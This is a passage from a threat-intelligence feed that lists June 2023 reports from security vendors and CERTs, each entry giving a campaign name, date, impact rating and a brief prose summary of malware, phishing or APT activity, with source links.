- ASEC researchers have observed that the encrypted malware file is downloaded from the threat actor’s server and executed. The malware in this instance is the RecordBreaker (Raccoon Stealer V2) Infostealer.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- RAT_Delivering_Through_VBS
- Date of Scan:
- 2023-06-19
- Impact:
- LOW
- Summary:
- Researchers from SANS have observed that RAT is delivering via VBS.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Cyberattacks_Against_Users_of_UKR_NET_Service
- Date of Scan:
- 2023-06-19
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have identified an e-mail was received from a participant of the information exchange with the subject “Suspicious activity observed @UKR.NET” and an attachment in the form of a PDF file “Security warning.pdf” sent, apparently, on behalf of UKR.NET technical support. The mentioned PDF document contains a link to a fraudulent web resource that imitates the web page of the postal service.
—
- Intel Source:
- CERT-UA
- Intel Name:
- GhostWriter_Group_Targeting_State_Organization_of_Ukraine
- Date of Scan:
- 2023-06-19
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have discovered the PPT document “daewdfq342r.ppt”, which contains a macro and a thumbnail image with the emblem of the National Defense University of Ukraine named after Ivan Chernyakhivskyi.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Formbook_From_Possible_ModiLoader
- Date of Scan:
- 2023-06-19
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed the recent Formbook samples and came across an example that kicks off with an Excel file exploiting CVE-2017-11882 to use what seems like ModiLoader (also known as DBatLoader).
—
- Intel Source:
- Cyfirma
- Intel Name:
- An_Evolving_Stealer_Called_Mystic
- Date of Scan:
- 2023-06-18
- Impact:
- LOW
- Summary:
- CYFIRMA researchers’ team recently discovered an information stealer called Mystic Stealer being promoted in an underground forum, with the threat actor utilizing a Telegram channel for their operations.
Source:
https://www.cyfirma.com/outofband/mystic-stealer-evolving-stealth-malware/
—
- Intel Source:
- Sygnia
- Intel Name:
- Analazying_a_global_adversary_in_the_middle_campaign
- Date of Scan:
- 2023-06-17
- Impact:
- LOW
- Summary:
- In the begining of this year, Sygnia’s IR team was investigating and analyzing about a Business Email Compromise (BEC) attack against one of its clients.The threat actor gained initial access to one of the victim employees’ accounts and executed an ‘Adversary In The Middle’ attack to bypass Office365 authentication and gain persistent access to that account. After getting the access, the threat actor exfiltrated data from the compromised account and used his access to spread phishing attacks to other victim’s employees along with several external targeted organizations.
Source:
https://blog.sygnia.co/cracking-global-phishing-campaign-using-threat-intelligence-toolkit
—
- Intel Source:
- Symantec
- Intel Name:
- Long_Running_Shuckworm_Intrusions_Against_Ukrainian_Organizations
- Date of Scan:
- 2023-06-17
- Impact:
- LOW
- Summary:
- Symantec researchers have identified that the Russian threat actor known as Shuckworm has continued its cyber assault spree against Ukrainian entities in a bid to steal sensitive information from compromised environments.
—
- Intel Source:
- Checkmarx
- Intel Name:
- Supply_Chain_Attackers_Exploiting_New_Technique
- Date of Scan:
- 2023-06-17
- Impact:
- LOW
- Summary:
- Checkmarx researchers have identified a new attack technique for hijacking S3 buckets by Supply Chain Attackers.
—
- Intel Source:
- Stairwell
- Intel Name:
- Chinese_Hackers_Using_DNS_Over_HTTPS_For_Linux_Malware_Communication
- Date of Scan:
- 2023-06-17
- Impact:
- LOW
- Summary:
- Researchers from Stairwell have observed that the Chinese threat group ‘ChamelGang’ infecting Linux devices with a previously unknown implant named ‘ChamelDoH,’ allowing DNS-over-HTTPS communications with attackers’ servers.
Source:
https://stairwell.com/news/chamelgang-and-chameldoh-a-dns-over-https-implant/
—
- Intel Source:
- Cofense
- Intel Name:
- MultiStage_Phishing_Attac_Targeted_Xneelo_Users
- Date of Scan:
- 2023-06-17
- Impact:
- LOW
- Summary:
- Cofense researchers have observed multi-stage phishing campaign targeting Xneelo customers was discovered, involving a fake KonsoleH login page to obtain login details, credit card information, and SMS 2FA codes.
Source:
https://cofense.com/blog/xneelo-users-targeted-in-a-multi-stage-phishing-attack/
—
- Intel Source:
- CADO Security
- Intel Name:
- An_Emerging_Romanian_Threat_Actor_Named_Diicot
- Date of Scan:
- 2023-06-17
- Impact:
- LOW
- Summary:
- Cado security researchers have identified an interesting attack pattern that could be attributed to the threat actor Diicot (formerly, “Mexals”).
Source:
https://www.cadosecurity.com/tracking-diicot-an-emerging-romanian-threat-actor/
—
- Intel Source:
- ASEC
- Intel Name:
- Lazarus_group_exploiting_Korean_finance_security_solution_vulnerability
- Date of Scan:
- 2023-06-16
- Impact:
- LOW
- Summary:
- The ASEC team have observed Lazarus threat group exploiting new vulnerabilities in VestCert and TCO!Stream. Update software promptly to mitigate risks. Stay informed, strengthen security measures against advanced threats.
—
- Intel Source:
- Trellix
- Intel Name:
- Phishing_Attacks_Using_HTML_Attachments
- Date of Scan:
- 2023-06-16
- Impact:
- LOW
- Summary:
- Trellix researchers have identified a phishing attacks using HTML attachments are increasing rapidly, targeting global industries with obfuscation techniques and evasion methods, requiring heightened vigilance and strong email security measures.
—
- Intel Source:
- Netskope
- Intel Name:
- Netskope_DL_based_Inline_Phishing_Detection
- Date of Scan:
- 2023-06-16
- Impact:
- LOW
- Summary:
- Netskope Threat Labs have observed ChatGPT facilitates natural language processing and communication, while Netskope’s Inline Phishing Detection focuses on identifying and blocking phishing attacks in real-time.
—
- Intel Source:
- HP Wolf Security
- Intel Name:
- A_New_ChromeLoader_Campaign_Named_Shampoo
- Date of Scan:
- 2023-06-16
- Impact:
- MEDIUM
- Summary:
- HP Wolf Security detects new malware campaign “Shampoo” utilizing malicious ChromeLoader extension. It steals sensitive information, injects ads, and poses challenges for removal.
Source:
https://threatresearch.ext.hp.com/shampoo-a-new-chromeloader-campaign/
—
- Intel Source:
- Microsoft
- Intel Name:
- Introducing_Cadet_Blizzard_as_a_Significant_New_Russian_Threat_Actor
- Date of Scan:
- 2023-06-15
- Impact:
- MEDIUM
- Summary:
- Microsoft researchers have updated details about techniques of a threat actor formerly tracked as DEV-0586—a distinct Russian state-sponsored threat actor that has now been elevated to the name Cadet Blizzard.
—
- Intel Source:
- Trellix
- Intel Name:
- New_Golang_Based_Skuld_Malware
- Date of Scan:
- 2023-06-14
- Impact:
- MEDIUM
- Summary:
- Trellix researchers have identified a new Golang-based information stealer called Skuld that has compromised Windows systems across Europe, Southeast Asia, and the US.
—
- Intel Source:
- Sygnia
- Intel Name:
- Analyzing_a_global_adversary_in_the_middle_campaign
- Date of Scan:
- 2023-06-14
- Impact:
- LOW
- Summary:
- In the begining of this year, Sygnia’s IR team was investigating and analyzing about a Business Email Compromise (BEC) attack against one of its clients.The threat actor gained initial access to one of the victim employees’ accounts and executed an ‘Adversary In The Middle’ attack to bypass Office365 authentication and gain persistent access to that account. After getting the access, the threat actor exfiltrated data from the compromised account and used his access to spread phishing attacks to other victim’s employees along with several external targeted organizations.
Source:
https://blog.sygnia.co/cracking-global-phishing-campaign-using-threat-intelligence-toolkit
—
- Intel Source:
- Dr.WEB
- Intel Name:
- Pirated_Windows_10_ISOs_Install_Clipper_Malware
- Date of Scan:
- 2023-06-14
- Impact:
- MEDIUM
- Summary:
- Dr.WEB researchers have identified that hackers are distributing Windows 10 using torrents that hide cryptocurrency hijackers in the EFI (Extensible Firmware Interface) partition to evade detection.
—
- Intel Source:
- Cyble
- Intel Name:
- WannaCry_Imitator_targets_Russian_Gaming_Community
- Date of Scan:
- 2023-06-14
- Impact:
- MEDIUM
- Summary:
- Cyble reserachers observed recently some phishing campaigns that use gaming sites as a distribution channel for various malware families. They discovered a phishing campaign targeting Russian-speaking gamers targeting to distribute ransomware. The fake website lets install a file that contains a legitimate game installer and ransomware. The ransomware has used the name “WannaCry 3.0” and utilizes the “wncry” file extension for encrypting files, although it is not a orogonal variant of the WannaCry ransomware. This ransomware is a modified version of an open-source Ransomware “Crypter”, developed for Windows and written purely in Python.
—
- Intel Source:
- TrendMicro
- Intel Name:
- A_Look_into_Earth_Preta_Hidden_Working
- Date of Scan:
- 2023-06-14
- Impact:
- LOW
- Summary:
- TrendMicro researchers have discussed the more technical details of the most recent tools, techniques, and procedures (TTPs) leveraged by the Earth Preta APT group.
—
- Intel Source:
- Netscope
- Intel Name:
- The_risks_of_zip_and_mov_domains
- Date of Scan:
- 2023-06-14
- Impact:
- LOW
- Summary:
- Sometime ago Google discovered and shared eight new top level domains. Two of them (.zip and .mov) have been a concern because they are similar to well known file extensions. Both .zip and .mov TLD are not new, as they have been available since 2014. The main threat was that anyone now can own a .zip or .mov domain and be taken advantage for social engineering at a cheap price. The threat with the .zip and .mov domains is that attackers will be able to craft URLs that appear to be delivering ZIP and MOV files, but instead will redirect victims to malicious websites.
Source:
https://www.netskope.com/blog/zip-and-mov-top-level-domain-abuse-one-month-after-being-made-public
—
- Intel Source:
- Securelist
- Intel Name:
- Multistage_DoubleFinger_loads_GreetingGhoul_stealer
- Date of Scan:
- 2023-06-13
- Impact:
- LOW
- Summary:
- Securilist shared their analyses about the multi-stage DoubleFinger loader delivering a cryptocurrency stealer. DoubleFinger is deployed on the target machine, when the victim opens a malicious PIF attachment in an email message, ultimately executing the first of DoubleFinger’s loader stages.
Source:
https://securelist.com/doublefinger-loader-delivering-greetingghoul-cryptocurrency-stealer/109982/
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Phishing_Threats_analyses_May_28_June_3_20
- Date of Scan:
- 2023-06-13
- Impact:
- LOW
- Summary:
- The ASEC analysis team keeps monitoring phishing email threats with their system and honeypot. This article explains the distribution of phishing emails during the week from May 28th to June 3rd, 2023 and provide statistical information on each type.
—
- Intel Source:
- Sophos
- Intel Name:
- Diving_Deep_into_Pikabot_Cyber_Threat
- Date of Scan:
- 2023-06-13
- Impact:
- LOW
- Summary:
- Sophos researchers have identified Pikabot malware, Pikabot is a modular malware trojan acting as a backdoor, allowing unauthorized remote access and executing diverse commands received from a command-and-control server. It has the potential for multi-staged attacks
Source:
https://news.sophos.com/en-us/2023/06/12/deep-dive-into-the-pikabot-cyber-threat/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Activity_of_DShield_Honeypot
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- Researchers from SANS have reviewed the DShield honeypot stored the previous month. Also interesting is how the activity varies from week to week.
Source:
https://isc.sans.edu/diary/DShield+Honeypot+Activity+for+May+2023/29932/
—
- Intel Source:
- Cyble
- Intel Name:
- Malicious_PyPI_Packages
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- Cyble Research and Intelligence Labs analysts have been actively tracking malicious python packages and recently observed different infostealersr, one is dubbed as KEKW that was spreading through multiple malicious python packages, another one was the Creal Stealer, which is an open-source stealer that has been extensively utilized by threat actors. There was no evidence of it being propagated through Python packages. Cyble researches discovered several Python packages that were found to distribute the Creal Stealer. Another ones, The TIKCOCK GRABBER, The Hazard Token Grabber, the W4SP stealer, are type of Information Stealer malwares that focuse on extracting sensitive information from victims’ systems. Cyble’s analysis revealed that InfoStealers, a specific type of malware, was predominantly propagated through malicious Python packages. The presence of readily accessible code for information Stealers on platforms like GitHub has empowered multiple threat actors to leverage this particular strain of malware in their campaigns.
Source:
https://blog.cyble.com/2023/06/09/over-45-thousand-users-fell-victim-to-malicious-pypi-packages/
—
- Intel Source:
- ISC. SANS
- Intel Name:
- Undetected_PowerShell_Backdoor
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- ISC. SANS researcher Xavier Mertens found a script that scored 0/59 on VT. He provided the details on his findings on it. The file was found with the name « Microsoft.PowerShell_profile.ps1 ». The attacker decided to select that name because this is a familiar name used by Microsoft to manage PowerShell profiles.
—
- Intel Source:
- Obsidian
- Intel Name:
- A_SaaS_ransomware_attack_against_a_Sharepoint_365
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- Obsidian’s Threat Research team has observed a SaaS ransomware attack against a company’s Sharepoint Online (Microsoft 365) without using a compromised endpoint. Our team and product were leveraged post-compromise to determine the finer details of the attack.
Source:
https://www.obsidiansecurity.com/blog/saas-ransomware-observed-sharepoint-microsoft-365/
—
- Intel Source:
- Cyble
- Intel Name:
- Darkrace_Ransomware_Resembles_LockBit_Ransomware
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- Cyble researchers have discovered a new ransomware named Darkrace which has similarities with Lockbit Ransomware. It is specifically targeting Windows operating systems and exhibits several similarities to the LockBit ransomware, including the deployment of batch files to terminate processes, the dropping of file icons, and the utilization of random encryption extensions.
Source:
https://blog.cyble.com/2023/06/08/unmasking-the-darkrace-ransomware-gang/
—
- Intel Source:
- Elastic
- Intel Name:
- Hackers_Targeting_Vietnamese_Public_Companies_With_SPECTRALVIPER_Backdoor
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- Researchers from Elastic have identified an ongoing campaign that deploys a novel backdoor called SPECTRALVIPER which is targeting Vietnamese public companies. It is a heavily obfuscated, previously undisclosed, x64 backdoor that brings PE loading and injection, file upload and download, file and directory manipulation, and token impersonation capabilities.
Source:
https://www.elastic.co/security-labs/elastic-charms-spectralviper
—
- Intel Source:
- DFIR Report
- Intel Name:
- Truebot_Using_Cobalt_Strike_and_FlawedGrace
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- The DFIR Report researchers have identified that Truebot is delivering through a Traffic Distribution System. This campaign, observed in May 2023, leveraged email for the initial delivery mechanism. After clicking through the link in an email, the victim would be redirected through a series of URLs before being presented with a file download at the final landing page.
Source:
https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
—
- Intel Source:
- Securelist
- Intel Name:
- Satacom_malware_steals_cryptocurrency
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- Securilist shared retheir analyses about recent malware distribution campaign related to the Satacom downloader, also known as LegionLoader, is a renewed malware family that has been around since 2019. The main goal of this malware that is dropped by the Satacom downloader is to steal BTC from the victim’s account by performing web injections into targeted cryptocurrency websites. The malware tries to install an extension for Chromium-based web browsers, which later communicates with its C2 server, whose address is stored in the BTC transaction data.
Source:
https://securelist.com/satacom-delivers-cryptocurrency-stealing-browser-extension/109807/
—
- Intel Source:
- Blackberry
- Intel Name:
- RomCom_Group_Targeting_Politicians_in_Ukraine_and_US_Based_Healthcare
- Date of Scan:
- 2023-06-09
- Impact:
- MEDIUM
- Summary:
- Blackberry researchers have observed RomCom targeting politicians in Ukraine who are working closely with Western countries, and a U.S.-based healthcare company providing humanitarian aid to the refugees fleeing from Ukraine and receiving medical assistance in the U.S.
Source:
https://blogs.blackberry.com/en/2023/06/romcom-resurfaces-targeting-ukraine
—
- Intel Source:
- Cofense
- Intel Name:
- Caffeine_phishing_domains_and_patterns_still_active_despite_store_closure
- Date of Scan:
- 2023-06-09
- Impact:
- LOW
- Summary:
- Cofense researchers have observed an ongoing and evolving campaign of credential phishing activity has been detected, specifically targeting Microsoft Office 365 credentials. This campaign involves the distribution of fraudulent emails that aim to deceive recipients and trick them into divulging their Office 365 login credentials.
—
- Intel Source:
- Welivesecurity
- Intel Name:
- The_Details_About_Asylum_Ambuscade_Cybercrime_Group
- Date of Scan:
- 2023-06-09
- Impact:
- LOW
- Summary:
- Researchers from Welivesecurity have analyzed the Asylum Ambuscade cybercrime group that has been performing cyberespionage operations on the side and provided details about the early 2022 espionage campaign and about multiple cybercrime campaigns in 2022 and 2023.
Source:
https://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/
—
- Intel Source:
- Group-IB
- Intel Name:
- Dark_Pink_APT_Group_Return_With_5_Victims_in_New_Countries
- Date of Scan:
- 2023-06-09
- Impact:
- LOW
- Summary:
- Group-IB researchers have identified new tools, exfiltration mechanisms, and victims in new industries, in countries that Dark Pink has never targeted before. It has continued to attack government, military, and non-profit organizations in the Asia-Pacific expanding its operations to Thailand and Brunei. Another victim, an educational sector organization, has also been identified in Belgium.
—
- Intel Source:
- Checkpoint
- Intel Name:
- North_African_Espionage_Attacks_Using_Stealth_Soldier_Backdoors
- Date of Scan:
- 2023-06-09
- Impact:
- MEDIUM
- Summary:
- Check Point researchers have identified an ongoing operation against targets in North Africa involving a previously undisclosed multi-stage backdoor called Stealth Soldier. The malware Command and Control network is part of a larger set of infrastructure, used at least in part for spear-phishing campaigns against government entities.
—
- Intel Source:
- JPCERT
- Intel Name:
- GobRAT_malware_targeting_Linux_routers
- Date of Scan:
- 2023-06-09
- Impact:
- MEDIUM
- Summary:
- JPCERT/CC has shared about attacks that infected routers in Japan with malware around February 2023. Their analyses blog gives the details of the attack confirmed by JPCERT/CC and GobRAT malware, which was used in the attack. Based on JPCERT analyses, the attack vector and target initially was a router whose WEBUI is open to the public, executes scripts possibly by using vulnerabilities, and finally infects the GobRAT
—
- Intel Source:
- ASEC
- Intel Name:
- Hackers_Distributing_Malicious_Job_Application_Letters
- Date of Scan:
- 2023-06-08
- Impact:
- LOW
- Summary:
- ASEC researchers have identified that malware disguised as a job application letter is continuously being distributed. This malware is equipped with a feature that checks for the presence of various antivirus processes.
—
- Intel Source:
- Barracuda
- Intel Name:
- Zero_Day_Flaw_in_Barracuda_Email_Security_Gateway_Appliances
- Date of Scan:
- 2023-06-08
- Impact:
- MEDIUM
- Summary:
- Researchers from Barracuda have urged their customers who were impacted by a recently disclosed zero-day flaw in its Email Security Gateway (ESG) appliances to immediately replace them.
Source:
https://www.barracuda.com/company/legal/esg-vulnerability
—
- Intel Source:
- Cofense
- Intel Name:
- The_Return_of_Vacation_Request_Phishing_Emails
- Date of Scan:
- 2023-06-08
- Impact:
- LOW
- Summary:
- Cofense researchers have observed a phishing campaign where the threat actor sends an email to a user that claims to be from the ‘HR Department’ and provided the user with a link to submit their annual leave requests.
Source:
https://cofense.com/blog/summer-time-scams-the-return-of-vacation-request-phishing-emails/
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- ITG10_Group_Targeting_South_Korean_Entities
- Date of Scan:
- 2023-06-07
- Impact:
- LOW
- Summary:
- IBM Security researchers have uncovered documents that are most likely part of a phishing campaign mimicking credible senders, orchestrated by a group X-Force refers to as ITG10, and aimed at delivering RokRAT malware.
Source:
https://securityintelligence.com/posts/itg10-targeting-south-korean-entities/
—
- Intel Source:
- Recorded Future
- Intel Name:
- North_Korean_TAG71_Group_Spoofs_Asian_and_US_Financial_Institutions
- Date of Scan:
- 2023-06-07
- Impact:
- MEDIUM
- Summary:
- Recorded Future researchers have discovered malicious cyber threat activity spoofing several financial institutions and venture capital firms in Japan, Vietnam, and the United States. They refer to the group behind this activity as Threat Activity Group 71 (TAG-71). Also, identified 74 domains resolving to 5 IP addresses, as well as 6 malicious files, in the most recent cluster of activity from September 2022 to March 2023.
Source:
https://go.recordedfuture.com/hubfs/reports/cta-2023-0606.pdf
—
- Intel Source:
- Lumen
- Intel Name:
- Qakbot_Retool_Reinfect_Recycle
- Date of Scan:
- 2023-06-07
- Impact:
- LOW
- Summary:
- Lumen researchers observed recent Qakbot’s campaigns to see insights of their network structure, and gained key insights into the methods that support Qakbot’s reputation as an evasive and tenacious threat.
Source:
https://blog.lumen.com/qakbot-retool-reinfect-recycle/?utm_source=substack&utm_medium=email
—
- Intel Source:
- Cyble
- Intel Name:
- Hackers_Targeting_Korean_Users_via_Malicious_Document_Files
- Date of Scan:
- 2023-06-07
- Impact:
- LOW
- Summary:
- Cyble researchers have discovered an ongoing campaign associated with the notorious ransomware group LockBit. It has once again embraced the approach of disseminating malware through malicious document files targeting Korean individuals. Notably, the group utilized the same template injection techniques to deliver their payload.
Source:
https://blog.cyble.com/2023/06/06/lockbit-ransomware-2-0-resurfaces/
—
- Intel Source:
- TrendMicro
- Intel Name:
- The_Examination_of_TargetCompany_Ransomware
- Date of Scan:
- 2023-06-07
- Impact:
- LOW
- Summary:
- TrendMicro researchers have identified that threat actors behind TargetCompany ransomware clarified that each major update of the ransomware entailed a change in the encryption algorithm and different decryptor characteristics. These are accompanied by a change in file name extensions, hence the evolution of names by which the ransomware group is known.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Cyberespionage_Against_Ukrainian_State_Bodies_and_Media
- Date of Scan:
- 2023-06-06
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have identified that files (.HTA, .EXE, .RAR, .LNK) are distributed by unknown persons using e-mail and instant messengers, the launch of which leads to damage to the victim’s computer by the LONEPAGE malicious program.
—
- Intel Source:
- Sentinelone
- Intel Name:
- New_Social_Engineering_Campaign_Aims_to_Steal_Credentials_and_Gather_Strategic_Intelligence
- Date of Scan:
- 2023-06-06
- Impact:
- MEDIUM
- Summary:
- SentinelLabs researchers have tracked a social engineering campaign by the North Korean APT group Kimsuky targeting experts in North Korean affairs, part of a broader campaign discussed in a recent NSA advisory.
—
- Intel Source:
- Akamai
- Intel Name:
- Hackers_Take_Over_Legitimate_Sites_to_Host_Credit_Card_Stealer_Scripts
- Date of Scan:
- 2023-06-06
- Impact:
- LOW
- Summary:
- Akamai researchers have observed a new Magecart credit card stealing campaign hijacks legitimate sites to act as “makeshift” command and control (C2) servers to inject and hide the skimmers on targeted eCommerce sites.
Source:
https://www.akamai.com/blog/security-research/new-magecart-hides-behind-legit-domains
—
- Intel Source:
- Splunk
- Intel Name:
- Detection_and_Analysis_of_RedLine_Stealer
- Date of Scan:
- 2023-06-06
- Impact:
- LOW
- Summary:
- RedLine Stealer is a malware strain designed to steal sensitive information from compromised systems. It is typically distributed through phishing emails, social engineering tactics, and malicious URL links.
—
- Intel Source:
- Huntress
- Intel Name:
- MOVEit_Transfer_Critical_Vulnerability
- Date of Scan:
- 2023-06-06
- Impact:
- LOW
- Summary:
- Researchers from Hunteers have investigated the exploitation of critical MOVEit transfer vulnerability CVE-2023-34362.
Source:
https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
—
- Intel Source:
- Perception Point
- Intel Name:
- Diving_Deep_into_Red_Deer
- Date of Scan:
- 2023-06-05
- Impact:
- LOW
- Summary:
- Researchers from Perception Point have deeply analyzed a malware campaign crafted specifically for the Israeli audience called Red Deer.
Source:
https://perception-point.io/blog/operation-red-deer/
—
- Intel Source:
- VMware
- Intel Name:
- Detection_of_Carbon_Black_TrueBot_Malware
- Date of Scan:
- 2023-06-05
- Impact:
- LOW
- Summary:
- VMware’s Carbon Black Managed Detection and Response (MDR) team began seeing a surge of TrueBot activity. TrueBot is under active development by Silence, with recent versions using a Netwrix vulnerability for delivery.
Source:
https://blogs.vmware.com/security/2023/06/carbon-blacks-truebot-detection.html
—
- Intel Source:
- Esentire
- Intel Name:
- Return_of_GuLoader_VBScript_Variant_with_PowerShell_Updates
- Date of Scan:
- 2023-06-05
- Impact:
- LOW
- Summary:
- GuLoader is a sophisticated malware loader which has heavily abused tax-themed lures. TRU reported on ongoing GuLoader activity using tax-themed lures and decoy files TRU identified an updated VBScript GuLoader variant across multiple customers.
Source:
https://www.esentire.com/blog/guloader-vbscript-variant-returns-with-powershell-updates
—
- Intel Source:
- Menlo Security
- Intel Name:
- Analysis_of_XeGroups_Attack_Techniques_Detected
- Date of Scan:
- 2023-06-05
- Impact:
- LOW
- Summary:
- XeGroup’s tactics, techniques, and procedures have been detailed in a report by Volexity, which suggests that the group may be associated with other cybercriminal organizations and may have links to state-sponsored hacking groups.
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Chinese_Hackers_Using_Modified_Cobalt_Strike_Variant_to_Attack_Taiwanese_Critical_Infrastructure
- Date of Scan:
- 2023-06-05
- Impact:
- LOW
- Summary:
- EclecticIQ researchers have identified a malicious web server very likely operated by a Chinese threat actor used to target Taiwanese government entities, including critical infrastructure
—
- Intel Source:
- Symantec
- Intel Name:
- Lancefly_APT_Targets_Governments_Aviation_and_Organizations_with_Custom_Backdoors
- Date of Scan:
- 2023-06-03
- Impact:
- LOW
- Summary:
- Researchers from Symantec have identified that Lancefly APT goup has been using custom backdoors for several years to target organizations in South and Southeast Asia.
—
- Intel Source:
- Checkpoint
- Intel Name:
- The_Camaro_Dragon_Strikes_with_a_New_TinyNote_Backdoor
- Date of Scan:
- 2023-06-03
- Impact:
- LOW
- Summary:
- Checkpoint researchers have observed that a Chinese nation-stage group known as Camaro Dragon has been linked to yet another backdoor that’s designed to meet its intelligence-gathering goals.
Source:
https://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/
—
- Intel Source:
- Sentinelone
- Intel Name:
- Operation_Magalenha
- Date of Scan:
- 2023-06-02
- Impact:
- LOW
- Summary:
- SentinelLabs has been tracking a campaign over the rst quarter of 2023 targeting users of Portuguese nancial institutions, including government, government-backed, and private institutions.
—
- Intel Source:
- Talos
- Intel Name:
- New_unidentified_botnet_campaign_Horabot
- Date of Scan:
- 2023-06-02
- Impact:
- LOW
- Summary:
- Cisco Talos researchers have identified that unidentified botnet program Talos is calling “Horabot,” which delivers a known banking trojan and spam tool onto victim machines in a campaign.
Source:
https://blog.talosintelligence.com/new-horabot-targets-americas/
—
- Intel Source:
- ReversingLabs
- Intel Name:
- Who_and_What_Threatens_the_World_Column_exe_malware
- Date of Scan:
- 2023-06-02
- Impact:
- LOW
- Summary:
- The ReversingLabs research team has identified a novel attack on PyPI using compiled Python code to evade detection possibly the first attack to take advantage of PYC file direct execution.
—
- Intel Source:
- Securelist
- Intel Name:
- Previously_unknown_malware_attacked_IOS_devices
- Date of Scan:
- 2023-06-02
- Impact:
- LOW
- Summary:
- During of monitoring the network traffic of Securelist corporate Wi-Fi network, the researchers observed suspicious activity that originated from several iOS-based phones. Beucase it was impossible to inspect modern iOS devices from the inside, the researchers created offline backups of the devices in question, inspected them using the Mobile Verification Toolkit’s mvt-ios and discovered traces of compromise. The called this campaign “Operation Triangulation”.
Source:
https://securelist.com/operation-triangulation/109842/
—
- Intel Source:
- Cyble
- Intel Name:
- SharpPanda_APT_Campaign_Expands
- Date of Scan:
- 2023-06-02
- Impact:
- LOW
- Summary:
- Cyble reserachers observed an ongoing campaign by SharpPanda APT. Before, this APT group has a history of targeting government officials, particularly in Southeast Asian countries. This latest campaign specifically targets high-level government officials from G20 nations.
Source:
https://blog.cyble.com/2023/06/01/sharppanda-apt-campaign-expands-its-arsenal-targeting-g20-nations/
—
- Intel Source:
- Blackberry
- Intel Name:
- Operation_CMDStealer
- Date of Scan:
- 2023-06-02
- Impact:
- LOW
- Summary:
- BlackBerry researchers have identified an unknown financially motivated threat actor, very likely from Brazil, is targeting Spanish- and Portuguese-speaking victims, with the goal of stealing online banking access. The victims are primarily in Portugal, Mexico, and Peru. This threat actor employs tactics such as LOLBaS (Living Off the Land Binaries and Scripts), along with CMD-based scripts to carry out its malicious activities.
Source:
https://blogs.blackberry.com/en/2023/05/cmdstealer-targets-portugal-peru-and-mexico
—
- Intel Source:
- Cleafy
- Intel Name:
- The_deeper_techniques_of_sLoad_Ramnit_and_drIBAN
- Date of Scan:
- 2023-06-01
- Impact:
- LOW
- Summary:
- Cleafy analysts shared in their blog the deeper techniques that that made them connect sLoad, Ramnit, and drIBAN malwares. The analysts provided some Ramnit characteristics and the techniques used to perform the MiTB attack and deliver its injection kit.
Source:
https://www.cleafy.com/cleafy-labs/uncovering-driban-fraud-operations-chapter-2
—
- Intel Source:
- ISC. SANS
- Intel Name:
- The_attacks_against_Apache_NiFi
- Date of Scan:
- 2023-06-01
- Impact:
- LOW
- Summary:
- On May 19th, Johannes Ullrich, ISC SANS analyst noted a rapid increase in requests like: Attacks Against Apache NiFi. Apache NiFi describes itself as “an easy-to-use, powerful, and reliable system to process and distribute data. For sure one actor is actively scanning the Internet for unprotected instances of Apache NiFi. That threat actor will add processors in Apache NiFi to either istall a crypto coin miner and then to perform lateral movement by searching the server for SSH credentials.
—
- Intel Source:
- ASEC
- Intel Name:
- Distribution_of_Malware_Disguised_as_Hancom_Office_Document_File_Detected
- Date of Scan:
- 2023-06-01
- Impact:
- LOW
- Summary:
- AhnLab Security Emergency response Center (ASEC) has confirmed the distribution of malware disguised as Hancom Office document files. The malware that is being distributed is named “Who and What Threatens the World (Column).exe” and is designed to deceive users by using an icon that is similar to that of Hancom Office.
—
- Intel Source:
- Eclypsium
- Intel Name:
- Gigabyte_App_Center_Backdoor_risk
- Date of Scan:
- 2023-06-01
- Impact:
- LOW
- Summary:
- Recently, the Eclypsium platform observed some suspicious backdoor behavior inside of Gigabyte systems. Their detectors detected new previously-unknown supply chain threats, where legitimate third-party technology products or updates have been compromised. The Eclypsium analysis discovered that firmware in Gigabyte systems is dropping and executing a Windows native executable file during the system startup process, and this executable one then downloads and executes additional payloads insecurely. It uses the same techniques as other OEM backdoor-like features like Computrace backdoor (a.k.a. LoJack DoubleAgent) abused by threat actors and even firmware implants such as Sednit LoJax, MosaicRegressor, Vector-EDK.
Source:
https://eclypsium.com/blog/supply-chain-risk-from-gigabyte-app-center-backdoor/
—
- Intel Source:
- AT&T
- Intel Name:
- A_new_Quasar_variant_SeroXen_RAT
- Date of Scan:
- 2023-06-01
- Impact:
- LOW
- Summary:
- AT&T Alien Labs researchers reviewed recent malicious samples, a new Quasar variant which was observed by Alien Labs in the wild -SeroXen. This new RAT is a modified branch of the open-source version, adding some modifications features to the original RAT.
Source:
https://cybersecurity.att.com/blogs/labs-research/seroxen-rat-for-sale
—
- Intel Source:
- TrendMicro
- Intel Name:
- The_connections_between_BlackSuit_and_Royal_ransomware
- Date of Scan:
- 2023-06-01
- Impact:
- LOW
- Summary:
- Researchers from Trendmicro analyzed BlackSuit ransomware and how it compares to Royal Ransomware. Several researchers on Twitter discovered a new ransomware family called BlackSuit that targeted both Windows and Linux users. Some Twitter posts also mentioned connections between BlackSuit and Royal, which triggered Trendmicro reserchers interest. Trendmicro researchers shared in their blog the analyses of a Windows 32-bit sample of the ransomware from Twitter.
—
- Intel Source:
- ISC. SANS
- Intel Name:
- DocuSign_email_opens_to_script_based_infection
- Date of Scan:
- 2023-05-31
- Impact:
- LOW
- Summary:
